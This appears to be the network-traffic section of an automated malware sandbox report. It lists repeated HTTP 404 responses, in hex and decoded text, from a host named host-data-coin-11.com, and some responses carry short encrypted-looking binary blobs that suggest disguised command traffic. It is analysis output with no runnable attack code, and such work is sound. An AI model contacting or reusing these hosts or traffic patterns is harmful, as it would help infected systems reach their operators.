Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 23:15:25 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 23:15:25 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 36 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 84 42 09 25 16 f9 b5 8f bd b8 15 a5 0c ce 2c b4 59 52 db 04 e5 fd 28 e3 22 58 1b b2 ed cf 00 b4 51 da 44 d0 f8 20 8c 21 ea ad 96 56 2c e4 b4 48 2b e3 b3 b6 68 f3 9a b9 59 a8 77 9f cb 31 41 5b 3d 03 4b de bb 4b bb ff 5b 91 ad d3 02 c4 60 9d d2 69 0d 0a 30 0d 0a 0d 0a Data Ascii: 66I:82OB%,YR("XQD !V,H+hYw1A[=KK[`i0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 23:15:27 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 23:15:27 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 23:15:27 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 63 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 90 df 1e 49 3a 44 a6 e8 de ea e4 40 fd 45 91 6e b8 57 5b 91 17 bf ec 31 e5 0d 0a 30 0d 0a 0d 0a Data Ascii: 2cI:82OI:D@EnW[10
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 23:15:48 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 23:15:49 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 23:15:49 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 23:15:49 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 23:15:50 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 23:15:50 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 23:15:50 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 23:15:50 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
